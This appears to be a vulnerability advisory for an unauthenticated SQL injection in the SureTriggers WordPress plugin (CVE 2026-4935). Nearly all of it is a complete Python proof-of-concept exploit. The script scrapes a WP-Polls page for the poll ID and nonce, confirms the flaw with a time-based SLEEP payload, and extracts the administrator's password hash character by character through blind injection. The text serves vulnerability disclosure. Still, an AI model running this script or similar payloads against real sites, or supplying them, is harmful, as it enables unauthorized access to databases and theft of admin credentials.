SureTriggers < 1.1.23 – Unauthenticated SQLi | CVE 2026-4935

Description

The plugin does not properly sanitize user input before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.
Proof of Concept

#!/usr/bin/env python3
"""
SureTriggers + WP-Polls Blind SQL Injection PoC
================================================
Demonstrates time-based blind SQLi via the poll answer field.
The SureTriggers trigger listener interpolates the comma-separated
answer IDs directly into an IN() clause without parameterization.

https://gist.github.com/mcdruid/5510d158f1fe274d9960df5af9928d6a

Usage:
    # Confirm injection with time-based test (default 5s sleep)
    python3 poc.py --url http://example.com/poll-page/ --skip-baseline

    # Route through Burp
    python3 poc.py --url http://example.com/poll-page/ --skip-baseline --proxy http://127.0.0.1:8080

    # Exfiltrate first N chars of admin password hash
    python3 poc.py --url http://example.com/poll-page/ --mode exfil --chars 65 --delay 2

Requirements: pip install requests beautifulsoup4
"""

import argparse
import re
import sys
import time
import string

import requests
from bs4 import BeautifulSoup


def get_session(proxy=None, verify_ssl=True):
    s = requests.Session()
    if proxy:
        s.proxies = {"http": proxy, "https": proxy}
    s.verify = verify_ssl
    return s


def scrape_poll(session, url):
    """Fetch the poll page and extract poll_id, a valid answer aid, and the nonce."""
    resp = session.get(url)
    resp.raise_for_status()
    soup = BeautifulSoup(resp.text, "html.parser")

    # Find the poll form - WP-Polls uses a form with id="polls_form_<id>"
    form = soup.find("form", id=re.compile(r"^polls_form_"))
    if not form:
        inp = soup.find("input", attrs={"name": re.compile(r"^poll_\d+$")})
        if not inp:
            print("[!] Could not find a poll form on the page.")
            print("    Make sure the URL points to a page with an active WP-Poll.")
            sys.exit(1)
        poll_id = inp["name"].replace("poll_", "")
        answer_aid = inp.get("value", "1")
    else:
        poll_id_match = re.search(r"polls_form_(\d+)", form.get("id", ""))
        if not poll_id_match:
            print("[!] Could not extract poll_id from form.")
            sys.exit(1)
        poll_id = poll_id_match.group(1)

        answer_input = form.find("input", attrs={"type": re.compile(r"radio|checkbox"), "name": f"poll_{poll_id}"})
        if not answer_input:
            print("[!] Could not find answer inputs in poll form.")
            sys.exit(1)
        answer_aid = answer_input["value"]

    # Extract the nonce - WP-Polls uses varying field names
    nonce = None

    nonce_input = soup.find("input", attrs={"id": f"poll_{poll_id}_nonce"})
    if nonce_input:
        nonce = nonce_input.get("value")

    if not nonce:
        nonce_input = soup.find("input", attrs={"name": "wp-polls-nonce"})
        if nonce_input:
            nonce = nonce_input.get("value")

    if not nonce:
        nonce_input = soup.find("input", attrs={"name": f"poll_{poll_id}_nonce"})
        if nonce_input:
            nonce = nonce_input.get("value")

    if not nonce:
        nonce_match = re.search(rf'(?:poll_{poll_id}_nonce|wp-polls-nonce)["\s]*(?:value="|:\s*["\'])([a-f0-9]+)', resp.text)
        if nonce_match:
            nonce = nonce_match.group(1)

    if not nonce:
        print(f"[!] Could not find poll nonce on the page.")
        print("    The poll may already have been voted on in this session/cookie.")
        sys.exit(1)

    print(f"[+] Poll ID:    {poll_id}")
    print(f"[+] Answer AID: {answer_aid}")
    print(f"[+] Nonce:      {nonce}")

    return poll_id, answer_aid, nonce


def get_vote_url(page_url):
    """Derive the WP-Polls vote handler URL."""
    from urllib.parse import urljoin
    return urljoin(page_url, "/wp-admin/admin-ajax.php")


def build_payload(answer_aid, sqli_fragment):
    """Build the poll answer value with the injection appended."""
    # The value goes into: WHERE polla_aid IN ($selected_answers_ids)
    # Injected: "6) AND (SLEEP(5))-- -"
    return f"{answer_aid}) AND ({sqli_fragment})-- -"


def submit_vote(session, vote_url, poll_id, payload, nonce, clean_cookies=False):
    """Submit the crafted poll vote and return the response + elapsed time."""
    if clean_cookies:
        session.cookies.clear()

    data = {
        "action": "polls",
        "view": "process",
        "poll_id": poll_id,
        f"poll_{poll_id}": payload,
        f"poll_{poll_id}_nonce": nonce,
    }

    start = time.time()
    resp = session.post(vote_url, data=data)
    elapsed = time.time() - start

    return resp, elapsed


def mode_sleep(session, page_url, poll_id, answer_aid, nonce, sleep_seconds, skip_baseline=False):
    """Confirm injection via SLEEP() timing."""
    vote_url = get_vote_url(page_url)

    baseline_time = None
    if not skip_baseline:
        print(f"\n[*] Phase 1: Baseline request (no injection)")
        print(f"    NOTE: WP-Polls blocks duplicate votes per IP.")
        print(f"    If baseline votes, the injected request may be blocked.")
        print(f"    Use --skip-baseline to avoid this.")
        baseline_payload = answer_aid
        _, baseline_time = submit_vote(session, vote_url, poll_id, baseline_payload, nonce, clean_cookies=True)
        print(f"    Baseline response time: {baseline_time:.2f}s")
    else:
        print(f"\n[*] Skipping baseline (--skip-baseline). Sending injection only.")

    print(f"\n[*] {'Phase 2: ' if not skip_baseline else ''}Injected request with SLEEP({sleep_seconds})")
    sqli = f"SLEEP({sleep_seconds})"
    injected_payload = build_payload(answer_aid, sqli)
    print(f"    Payload: poll_{poll_id}={injected_payload}")
    _, injected_time = submit_vote(session, vote_url, poll_id, injected_payload, nonce, clean_cookies=True)
    print(f"    Injected response time: {injected_time:.2f}s")

    if skip_baseline:
        if injected_time >= (sleep_seconds * 0.8):
            print(f"\n[+] VULNERABLE - response took {injected_time:.2f}s (expected ~{sleep_seconds}s for SLEEP).")
            return True
        else:
            print(f"\n[-] NOT CONFIRMED - response time ({injected_time:.2f}s) below threshold ({sleep_seconds * 0.8:.1f}s).")
            print(f"    Possible reasons:")
            print(f"    - Vote blocked (duplicate IP? reset poll log and retry)")
            print(f"    - Nonce expired (re-scrape by re-running)")
            print(f"    - WP-Polls rejecting malformed answer ID before hook fires")
            return False
    else:
        delta = injected_time - baseline_time
        print(f"\n[*] Time delta: {delta:.2f}s")

        if delta >= (sleep_seconds * 0.8):
            print(f"[+] VULNERABLE - response was ~{sleep_seconds}s slower, confirming SQL injection.")
            return True
        else:
            print(f"[-] NOT CONFIRMED - time delta ({delta:.2f}s) below threshold.")
            return False


def mode_exfil(session, page_url, poll_id, answer_aid, nonce, num_chars, delay):
    """Extract admin password hash via time-based blind using binary search."""
    vote_url = get_vote_url(page_url)

    extracted = ""

    print(f"\n[*] Exfiltrating admin password hash ({num_chars} chars)")
    print(f"    SQL target: SELECT user_pass FROM wp_users ORDER BY ID ASC LIMIT 1")
    print(f"    Sleep delay per test: {delay}s")
    print(f"    Technique: binary search on ORD() (~7 requests per char)")
    print()

    subquery = "(SELECT user_pass FROM wp_users ORDER BY ID ASC LIMIT 1)"

    for pos in range(1, num_chars + 1):
        low, high = 32, 126

        while low <= high:
            mid = (low + high) // 2

            # Comma-free SUBSTR(x FROM n FOR 1) syntax required because
            # WP-Polls splits the answer value on commas for multi-answer polls
            sqli_fragment = f"ORD(SUBSTR({subquery} FROM {pos} FOR 1))>{mid} AND SLEEP({delay})"
            payload = build_payload(answer_aid, sqli_fragment)
            _, elapsed = submit_vote(session, vote_url, poll_id, payload, nonce, clean_cookies=True)

            if elapsed >= (delay * 0.8):
                low = mid + 1
            else:
                high = mid - 1

        found_ord = low

        if found_ord == 0 or found_ord > 126:
            if found_ord == 0:
                print(f"\n[*] Null byte at position {pos}, likely end of string.")
                break
            extracted += "?"
            print(f"    [{pos:>3}] ??? (ord={found_ord} out of range)")
        else:
            ch = chr(found_ord)
            extracted += ch
            print(f"    [{pos:>3}] '{ch}' (ord={found_ord}) => {extracted}")

    print(f"\n[+] Extracted hash: {extracted}")
    return extracted


def main():
    parser = argparse.ArgumentParser(
        description="SureTriggers + WP-Polls Blind SQLi PoC",
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument("--url", required=True, help="Full URL of a page containing an active WP-Poll")
    parser.add_argument("--proxy", default=None, help="HTTP proxy (e.g. http://127.0.0.1:8080 for Burp)")
    parser.add_argument("--no-verify-ssl", action="store_true", help="Disable SSL verification (useful with proxy)")
    parser.add_argument("--mode", choices=["sleep", "exfil"], default="sleep",
                        help="sleep = confirm injection via timing; exfil = extract admin hash")
    parser.add_argument("--sleep", type=int, default=5, help="Seconds to SLEEP for timing confirmation (default: 5)")
    parser.add_argument("--skip-baseline", action="store_true",
                        help="Skip the baseline vote (avoids WP-Polls duplicate vote blocking)")
    parser.add_argument("--chars", type=int, default=34, help="Number of chars to exfiltrate in exfil mode (default: 34)")
    parser.add_argument("--delay", type=float, default=3, help="SLEEP delay per character in exfil mode (default: 3)")

    args = parser.parse_args()

    print("=" * 60)
    print("SureTriggers + WP-Polls Blind SQLi PoC")
    print("=" * 60)

    verify_ssl = not args.no_verify_ssl
    session = get_session(proxy=args.proxy, verify_ssl=verify_ssl)

    print(f"\n[*] Target: {args.url}")
    if args.proxy:
        print(f"[*] Proxy:  {args.proxy}")

    print(f"\n[*] Scraping poll page for form data and nonce...")
    poll_id, answer_aid, nonce = scrape_poll(session, args.url)

    if args.mode == "sleep":
        mode_sleep(session, args.url, poll_id, answer_aid, nonce, args.sleep, args.skip_baseline)
    elif args.mode == "exfil":
        print("\n[*] Confirming injection before exfiltration...")
        if mode_sleep(session, args.url, poll_id, answer_aid, nonce, args.sleep, skip_baseline=True):
            mode_exfil(session, args.url, poll_id, answer_aid, nonce, args.chars, args.delay)
        else:
            print("\n[!] Injection not confirmed. Aborting exfiltration.")
            sys.exit(1)


if __name__ == "__main__":
    main()